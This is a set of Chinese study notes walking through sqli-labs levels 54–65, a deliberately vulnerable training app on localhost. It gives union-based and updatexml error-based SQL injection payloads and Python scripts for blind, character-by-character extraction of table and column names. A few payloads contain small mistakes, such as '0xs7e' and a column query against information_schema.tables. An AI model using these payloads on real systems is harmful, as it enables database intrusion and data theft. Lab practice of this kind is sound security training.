sqli-labs5

54

id=0' and 1=1 union select 1,2,3 --+

id=0' and 1=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

dbs challenges

table qpu4f7zhcb

columns sessid,secret_6KIK,tryy

id=0' and 1=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='qpu4f7zhcb'),3 --+

id=0' and 1=1 union select 1,(select sessid from qpu4f7zhcb limit 0,1),(select secret_6KIK from qpu4f7zhcb limit 0,1) --+

55

)闭合

http://127.0.0.1/sqli-labs/Less-55/?id=0) union select 1,database(),3 --+

?id=0) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3--+

?id=0) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='8bgb8hj1sk'),3 --+

secret_MCQ1

id=0) union select 1,(select sessid from 8bgb8hj1sk limit 0,1),(select secret_MCQ1 from 8bgb8hj1sk limit 0,1) --+

56

')闭合 方法还是一样的

57

?id=-1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

58

使用?id=1 and 1=1 union select 1,2,3无回显

尝试报错注入

?id=0' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

?id=0' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

?id=0' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='y0584eq2pg'),0x7e),1)--+

?id=0' and updatexml(1,concat(0x7e,(select group_concat(secret_5U2L) from y0584eq2pg),0x7e),1)--+

59

数字型 和58一样

?id=0 and updatexml(1,concat(0x7e,database(),0x7e),1)--+

60

用")闭合 和58一样

61

用'))闭合

?id=0')) and updatexml(1,concat(0xs7e,database(),0x7e),1)--+

62

用')闭合 这关没回显 使用时间盲注

根据前面几关可以得到

数据库为 challenges

table 是随机10为字符组成

column是secret_ 和四位随机字符组成

本关限制重置次数为130次，可以写个python脚本试一下

?id=1') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{m}--+

?id=1') and ascii(substr((select group_concat(column_name) from information_schema.tables where table_schema=database() and table_name='8mdr4weo2b'),{i},1))>{m}--+

# 查表名
import requests

url = 'http://127.0.0.1/sqli-labs/Less-62/'

data = ''

payloads = list(range(48,58))+list(range(65,91))+list(range(97,123))

for i in range(1,11):  #已知表长为10
    low = 0
    high = 61
    while high-low>1:
        mid = (high + low)//2
        m = payloads[mid]           #二分法判断
        payload = f"?id=1') and ascii(substr((select group_concat(table_name) from " \
                  f"information_schema.tables where table_schema=database()),{i},1))>{m}--+"
        r = requests.get(url+payload)
        if 'Angelina' in r.text:   #Angelina是正常页面下的结果
            low = mid
        else:
            high = mid
    data += chr(payloads[high])
    print(data)

#查字段
import requests

url = 'http://127.0.0.1/sqli-labs/Less-62/'

data = ''

payloads = list(range(48,58))+list(range(65,91))+list(range(97,123))   

# 字段为secret_XXXX
for i in range(8,12):
    # print(i)
    low = 0
    high = 61
    while high - low > 1:
        mid = (high + low) // 2
        m = payloads[mid]  # 二分法判断
        payload = f"?id=1') and ascii(substr((select column_name from " \
                  f"information_schema.columns where table_name='eu3ls8m6rg' limit 2,1),{i},1))>{m}--+"
        r = requests.get(url+payload)
        if 'Angelina' in r.text:
            low = mid
        else:
            high = mid
    data += chr(payloads[high])
    print('secret_'+data)

63

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

方法同62

64

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

方法同62

65

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

方法同62